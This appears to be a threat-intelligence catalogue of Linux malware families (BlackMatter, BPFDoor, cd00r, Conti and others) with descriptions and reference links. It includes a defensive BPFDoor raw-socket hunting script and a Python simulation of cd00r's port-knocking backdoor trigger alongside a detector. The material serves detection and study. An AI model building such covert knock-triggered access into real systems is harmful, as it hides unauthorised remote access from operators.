- https://breached.company/when-the-defenders-become-the-attackers-cybersecurity-experts-indicted-for-blackcat-ransomware-operations/ - webarchive
- https://securelist.com/a-bad-luck-blackcat/106254/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.forescout.com/resources/analysis-of-an-alphv-incident - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html - webarchive
- https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01 - webarchive
- https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/ - webarchive
- https://blog.group-ib.com/blackcat - webarchive
- https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlackMatter (ELF)
Internal MISP references
UUID 1277a4bf-466c-40bc-b000-f55cbd0994a7 which can be used as unique global reference for BlackMatter (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter - webarchive
- https://twitter.com/VK_Intel/status/1423188690126266370 - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-291a - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
- https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Blackrota
Internal MISP references
UUID a30aedcc-562e-437a-827c-55bc00cf3506 which can be used as unique global reference for Blackrota in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/ - webarchive
- https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlackSuit (ELF)
According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.
Internal MISP references
UUID 5bdbeaae-0def-4547-9940-33ad94060955 which can be used as unique global reference for BlackSuit (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blacksuit - webarchive
- https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html - webarchive
- https://redsense.com/publications/royal-blacksuit-how-ransomware-rebrand-reshaped-them/ - webarchive
- https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/ - webarchive
- https://www.bleepingcomputer.com/news/security/law-enforcement-seizes-blacksuit-ransomware-leak-sites/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BOLDMOVE (ELF)
According to Mandiant, this malware family is attributed to a suspected Chinese actor and is directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). A Windows variant also exists.
Internal MISP references
UUID 8f347147-c34e-4698-9439-c640233fca15 which can be used as unique global reference for BOLDMOVE (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove - webarchive
- https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw - webarchive
- https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html - webarchive
- https://services.google.com/fh/files/misc/01-chinese-espionage-article-m-trends-2024.pdf - webarchive
- https://www.ncsc.nl/binaries/ncsc/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear/TLP-CLEAR+MIVD+AIVD+Advisory+COATHANGER.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bootkitty
Internal MISP references
UUID 8fc5c777-379e-4487-b108-88af1fca8a01 which can be used as unique global reference for Bootkitty in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Break out the Box
This is a pentesting tool; according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies."
It has been observed being used by TeamTNT to spread crypto-mining malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Break out the Box.
| Known Synonyms |
|---|
BOtB |
Internal MISP references
UUID 57c9ab70-7133-441a-af66-10c0e4eb898b which can be used as unique global reference for Break out the Box in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BotenaGo
According to Alien Labs, this malware targets embedded devices, including routers, with more than 30 exploits. Source code: https://github.com/Egida/kek/blob/19991ef983f838287aa9362b78b4ed8da0929184/loader_multi.go (2021-10-16)
Internal MISP references
UUID dffcc168-cb76-4ae6-b913-c369e92c614b which can be used as unique global reference for BotenaGo in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago - webarchive
- https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - webarchive
- https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BPFDoor
BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant.
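A passive backdoor of this kind has no listening port to find with `ss -lntu`; what it does leave behind is a process holding a raw AF_PACKET socket with a filter attached. The block below is an added hunting example (not the Qualys, Sandfly or Trend Micro detection scripts linked above): it parses `/proc/net/packet`, maps socket inodes back to the processes holding them through `/proc/<pid>/fd`, and reports raw-socket holders that are not one of the usual sniffing daemons. The `/proc/net/packet` contents and the process table in the sample are constructed; `collect_live()` gathers the real inputs on a Linux host.

```python
import glob
import os
import re
from collections import defaultdict

# /proc/net/packet columns (net/packet/af_packet.c):
#   sk RefCnt Type Proto Iface R Rmem User Inode
SOCK_RAW = 3
SOCK_DGRAM = 2
# Daemons that legitimately hold packet sockets on many hosts. The name comes
# from /proc/<pid>/comm, which the process itself controls, so a match means
# "verify the binary path and hash", not "benign".
KNOWN_SNIFFERS = {"dhclient", "dhcpcd", "tcpdump", "NetworkManager",
                  "wpa_supplicant", "systemd-networkd"}


def parse_packet_table(text):
    """Parse /proc/net/packet into dicts keyed by socket inode."""
    sockets = {}
    for line in text.splitlines()[1:]:          # skip the header row
        f = line.split()
        if len(f) < 9:
            continue
        sockets[int(f[8])] = {"type": int(f[2]), "proto": int(f[3], 16),
                              "iface": int(f[4]), "uid": int(f[7])}
    return sockets


def map_inodes_to_pids(procs):
    """procs: {pid: (comm, [targets of the /proc/<pid>/fd/* symlinks])}.
    A socket descriptor reads back as 'socket:[<inode>]'."""
    owners = defaultdict(set)
    for pid, (_comm, links) in procs.items():
        for target in links:
            m = re.fullmatch(r"socket:\[(\d+)\]", target)
            if m:
                owners[int(m.group(1))].add(pid)
    return owners


def find_raw_socket_holders(packet_text, procs):
    """Return (pid, comm, inode, proto) for every process holding a SOCK_RAW
    packet socket whose name is not on the sniffer list. This is the
    footprint a sniffing backdoor cannot avoid: it needs the raw socket to
    see the magic packet, whatever protocol (TCP, UDP, ICMP) carries it."""
    sockets = parse_packet_table(packet_text)
    owners = map_inodes_to_pids(procs)
    hits = []
    for inode, info in sockets.items():
        if info["type"] != SOCK_RAW:
            continue
        for pid in sorted(owners.get(inode, ())):
            comm = procs[pid][0]
            if comm not in KNOWN_SNIFFERS:
                hits.append((pid, comm, inode, info["proto"]))
    return hits


def collect_live():
    """Gather the same two inputs from a live Linux host (root is needed to
    read other users' fd tables)."""
    with open("/proc/net/packet") as fh:
        text = fh.read()
    procs = {}
    for d in glob.glob("/proc/[0-9]*"):
        pid = int(os.path.basename(d))
        try:
            with open(f"{d}/comm") as fh:
                comm = fh.read().strip()
            links = []
            for fd in glob.glob(f"{d}/fd/*"):
                try:
                    links.append(os.readlink(fd))
                except OSError:
                    pass
        except OSError:
            continue
        procs[pid] = (comm, links)
    return text, procs


# Constructed sample: a DHCP client and an unknown process each holding a raw
# packet socket (sk pointers are zeroed, as an unprivileged reader sees them).
SAMPLE_PACKET_TABLE = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
0000000000000000 3      3    0800   2     1 0      0      41285
0000000000000000 3      3    0003   0     1 0      0      15077
"""
SAMPLE_PROCS = {
    1: ("systemd", ["/dev/null", "socket:[1234]"]),
    812: ("dhclient", ["socket:[15077]", "/dev/null"]),
    1337: ("svchelper", ["/dev/null", "/dev/null", "socket:[41285]"]),
}
```

Run `find_raw_socket_holders(*collect_live())` on a host; for each hit, confirm the executable behind the PID (`/proc/<pid>/exe`, its hash, and whether the file on disk still exists), because the process name is the one thing the implant chooses for itself.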
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BPFDoor.
| Known Synonyms |
|---|
JustForFun |
Internal MISP references
UUID 3c7082b6-0181-4064-8e35-ab522b49200f which can be used as unique global reference for BPFDoor in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor - webarchive
- https://en.yna.co.kr/view/AEN20250526002700320 - webarchive
- https://twitter.com/CraigHRowland/status/1523266585133457408 - webarchive
- https://twitter.com/cyb3rops/status/1523227511551033349 - webarchive
- https://lolcads.github.io/posts/2023/12/bpf_memory_forensics_with_volatility3/ - webarchive
- https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ - webarchive
- https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/ - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896 - webarchive
- https://troopers.de/troopers22/talks/7cv8pz/ - webarchive
- https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game - webarchive
- https://haxrob.net/bpfdoor-past-and-present-part-2/ - webarchive
- https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html - webarchive
- https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/ - webarchive
- https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor - webarchive
- https://haxrob.net/bpfdoor-past-and-present-part-1/ - webarchive
- https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/# - webarchive
- https://nikhilh-20.github.io/blog/cbpf_bpfdoor/ - webarchive
- https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - webarchive
- https://unfinished.bike/fun-with-the-new-bpfdoor-2023 - webarchive
- https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BQTlock (ELF)
Internal MISP references
UUID 871ddba3-5479-41b4-986b-97f3baef6be8 which can be used as unique global reference for BQTlock (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BRICKSTORM
According to Google, BRICKSTORM is consistently used to target appliances, primarily VMware vCenter and ESXi hosts.
Internal MISP references
UUID 3b503e48-c50c-49ee-ab68-3c2f87eae398 which can be used as unique global reference for BRICKSTORM in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.brickstorm - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar25-338a - webarchive
- https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/ - webarchive
- https://blog.nviso.eu/wp-content/uploads/2025/04/NVISO-BRICKSTORM-Report.pdf - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
brute_ratel
Internal MISP references
UUID 2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8 which can be used as unique global reference for brute_ratel in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BUSHWALK
According to Mandiant, this is a webshell written in Perl.
Internal MISP references
UUID 77b96da8-d4c1-430d-8b08-3b4893e5d3ce which can be used as unique global reference for BUSHWALK in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bvp47
Pangu Lab discovered this backdoor during a forensic investigation in 2013 and refers to the related incidents as "Operation Telescreen".
Internal MISP references
UUID 0492f9bf-3c5d-4c17-993b-2b53d0fb06f7 which can be used as unique global reference for Bvp47 in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47 - webarchive
- https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html - webarchive
- https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf - webarchive
- https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - webarchive
- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/ - webarchive
- https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/ - webarchive
- https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Caja
Linux malware cross-compiled for x86, MIPS and ARM. Its strings are XOR-encoded. The C&C protocol supports 13 commands, including downloading, modifying and executing files and running shell commands.
Internal MISP references
UUID 06816c22-be7c-44db-8d0d-395ab306bb9b which can be used as unique global reference for Caja in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Caligula
According to Avast Decoded, Caligula is a multiplatform IRC bot that performs DDoS attacks. It is written in Go and distributed as ELF files for 32- and 64-bit Intel, 32-bit ARM and 64-bit PowerPC. It is based on the open-source Hellabot project.
Internal MISP references
UUID c936f24c-c04a-4cab-9ac6-6384a2d4c283 which can be used as unique global reference for Caligula in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Capoae
XMRig-based mining malware written in Go.
Internal MISP references
UUID c1b0528b-c674-4c76-8e1d-5846ba8af261 which can be used as unique global reference for Capoae in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
cd00r
A backdoor for UNIX operating systems that uses port knocking as its authentication method: it sniffs for connection attempts to a secret sequence of closed ports and only then opens its shell.
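Both sides of that mechanism, as an added example rather than cd00r's own source: the listener keeps a per-source state machine that advances only when the next expected port is hit within a time window, and the detector, which does not know the sequence, flags sources that probe several ports that never answered and then open a real session. The three-port sequence, the shell port and the connection log are constructed.

```python
from collections import defaultdict

# Constructed values: a hypothetical knock sequence and the port the backdoor
# opens afterwards. cd00r's real defaults are not given on this page.
KNOCK_SEQUENCE = [7000, 8000, 9000]
SHELL_PORT = 5002


class KnockListener:
    """Backdoor side. The knocks go to ports that are closed, so nothing
    answers and a port scan shows no listener; only a source that hits the
    ports in order within `window` seconds gets the shell opened for it."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=10.0):
        self.sequence = list(sequence)
        self.window = window
        self.progress = defaultdict(int)   # src -> index of next expected port
        self.started = {}                  # src -> time of its first good knock
        self.opened = set()                # sources granted the shell

    def observe_syn(self, ts, src, dport):
        idx = self.progress[src]
        if src in self.started and ts - self.started[src] > self.window:
            idx = 0                        # partial sequence too old: restart
        if dport == self.sequence[idx]:
            if idx == 0:
                self.started[src] = ts
            idx += 1
        elif dport == self.sequence[0]:    # wrong port, but a fresh first knock
            self.started[src] = ts
            idx = 1
        else:
            idx = 0                        # any other port resets the sequence
        if idx == len(self.sequence):
            self.opened.add(src)
            idx = 0
            self.started.pop(src, None)
        self.progress[src] = idx
        return src in self.opened


def find_knockers(events, min_closed_ports=3, window=10.0):
    """Defender side: the knock itself is the signal. Flag sources that hit
    at least `min_closed_ports` distinct ports that never answered and then,
    within `window` seconds, completed a real session.
    events: (ts, src, dport, state) with state 'rst' (closed) or 'est'."""
    by_src = defaultdict(list)
    for ts, src, dport, state in sorted(events):
        by_src[src].append((ts, dport, state))
    suspects = set()
    for src, evs in by_src.items():
        for i, (ts, dport, state) in enumerate(evs):
            if state != "est":
                continue
            closed = {p for t, p, s in evs[:i] if s == "rst" and ts - t <= window}
            if len(closed) >= min_closed_ports:
                suspects.add(src)
    return suspects


# Constructed connection log: (timestamp, source, destination port, outcome).
SAMPLE_LOG = [
    (100.0, "10.0.0.5", 7000, "rst"),        # knock 1 (closed port, RST back)
    (100.4, "10.0.0.5", 8000, "rst"),        # knock 2
    (100.9, "10.0.0.5", 9000, "rst"),        # knock 3
    (101.5, "10.0.0.5", SHELL_PORT, "est"),  # shell now open, session established
    (200.0, "10.0.0.9", 80, "est"),          # ordinary web client
    (300.0, "10.0.0.7", 22, "rst"),          # single failed probe, not a knock
    (400.0, "10.0.0.8", 9000, "rst"),        # right ports, wrong order
    (400.3, "10.0.0.8", 8000, "rst"),
    (400.6, "10.0.0.8", 7000, "rst"),
]


def replay(log=SAMPLE_LOG, sequence=KNOCK_SEQUENCE):
    """Feed a log to the listener; return the sources it would open for."""
    listener = KnockListener(sequence)
    for ts, src, dport, _state in log:
        listener.observe_syn(ts, src, dport)
    return listener.opened
```

The detector's input is what a firewall log or a flow record already gives you (SYNs to closed ports, then an established session from the same source); the threshold and window are tuning knobs, and ordinary port scanners will trip it too, which is acceptable since both deserve a look.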
Internal MISP references
UUID 94b4c990-9beb-4bcd-bd19-9ad8fe4386b9 which can be used as unique global reference for cd00r in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CDorked
This belongs to the same family as Ebury and Calfbot, and is also likely related to DarkLeech.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDorked.
| Known Synonyms |
|---|
CDorked.A |
Internal MISP references
UUID bb9eaaec-97c9-4014-94dd-129cecf31ff0 which can be used as unique global reference for CDorked in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked - webarchive
- https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ - webarchive
- https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html - webarchive
- https://blogs.cisco.com/security/linuxcdorked-faqs - webarchive
- https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/ - webarchive
- https://www.symantec.com/security-center/writeup/2013-050214-5501-99 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CDRThief
Internal MISP references
UUID 27d06ac9-42c4-433a-b1d7-660710d9e8df which can be used as unique global reference for CDRThief in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cephei
Internal MISP references
UUID baa0704b-50d8-48af-91e1-049f30f422cc which can be used as unique global reference for Cephei in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cetus
Internal MISP references
UUID 7a226df2-9599-4002-9a38-b044e16f76a9 which can be used as unique global reference for Cetus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chalubo
Sophos describes this malware as a DDoS bot, with its name originating from ChaCha-Lua-bot due to its use of ChaCha cipher and Lua. Variants exist for multiple architectures and it incorporates code from XorDDoS and Mirai.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chalubo.
| Known Synonyms |
|---|
ChaChaDDoS |
Internal MISP references
UUID af91c777-93f7-4b7f-981f-141478972011 which can be used as unique global reference for Chalubo in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.chalubo - webarchive
- https://blog.centurylink.com/the-pumpkin-eclipse/ - webarchive
- https://blog.lumen.com/the-pumpkin-eclipse/ - webarchive
- https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chaos (ELF)
Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.
Internal MISP references
UUID ef03e3c3-32d5-483a-bd1f-97dd531c4bca which can be used as unique global reference for Chaos (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chapro
Internal MISP references
UUID 700366d8-4036-4e48-9a5f-bd6e09fb9b6b which can be used as unique global reference for Chapro in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Chisel (ELF)
Chisel is an open-source project by Jaime Pillora (jpillora) that tunnels TCP and UDP connections over HTTP. It is cross-platform and written in Go. While benign in itself, Chisel has been used by multiple threat actors; for example, SentinelOne observed it during a PYSA ransomware campaign, where it was used for persistence and as a backdoor. GitHub: https://github.com/jpillora/chisel
Internal MISP references
UUID e5600185-39b7-49a0-bd60-a6806c7d47dd which can be used as unique global reference for Chisel (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Clop (ELF)
ELF version of the Clop ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clop (ELF).
| Known Synonyms |
|---|
| Cl0p |
Internal MISP references
UUID 3d11ec52-9ca8-4d83-99d4-6658f306e8e4 which can be used as unique global reference for Clop (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop - webarchive
- https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/ - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cloud Snooper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cloud Snooper.
| Known Synonyms |
|---|
| Snoopy |
Internal MISP references
UUID 0b1c514d-f617-4380-a28c-a1ed305a7538 which can be used as unique global reference for Cloud Snooper in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CMS8000 Backdoor
According to CISA, this is an implant found in firmware for the Contec CMS8000, a patient monitor used by the Healthcare and Public Health sector. An embedded backdoor function with a hard-coded IP address and functionality that enables patient data spillage was identified.
Internal MISP references
UUID 879cf39e-ca87-402f-87c6-2689c7da0238 which can be used as unique global reference for CMS8000 Backdoor in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cms8000_backdoor - webarchive
- https://claroty.com/team82/research/are-contec-cms8000-patient-monitors-infected-with-a-chinese-backdoor-the-reality-is-more-complicated - webarchive
- https://www.cisa.gov/sites/default/files/2025-01/fact-sheet-contec-cms8000-contains-a-backdoor-508c.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ConnectBack
ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ConnectBack.
| Known Synonyms |
|---|
| Getshell |
Internal MISP references
UUID 82c57d1b-c11b-44f7-9675-2f0d23fb543f which can be used as unique global reference for ConnectBack in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Conti (ELF)
Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conti (ELF).
| Known Synonyms |
|---|
| Conti Locker |
Internal MISP references
UUID c1ab8323-ce61-409a-80f3-b945c8ffcd42 which can be used as unique global reference for Conti (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://www.shadowbanker.io/2025/05/shadow-banker-makes-glorious-return-interviews-guy-exposing-conti-command-control/ - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html - webarchive
- https://damonmccoy.com/papers/Ransomware_eCrime22.pdf - webarchive
